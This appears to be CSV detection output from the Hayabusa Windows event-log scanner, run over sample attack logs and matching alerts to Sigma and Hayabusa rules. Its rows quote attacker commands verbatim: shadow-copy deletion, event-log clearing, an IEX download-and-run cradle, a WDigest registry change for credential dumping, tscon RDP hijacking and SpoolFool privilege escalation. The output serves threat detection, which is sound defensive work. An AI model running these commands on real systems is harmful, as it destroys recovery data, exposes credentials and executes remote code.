0x308fd50bf,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx +2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx +2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow 
Copies via WMI with PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-20 00:13:49.041 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx +2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! 
(Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object 
Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t 
REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable 
UseLogonCredential,,../hayabusa-rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-02-09 05:33:10.918 +09:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: 
jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx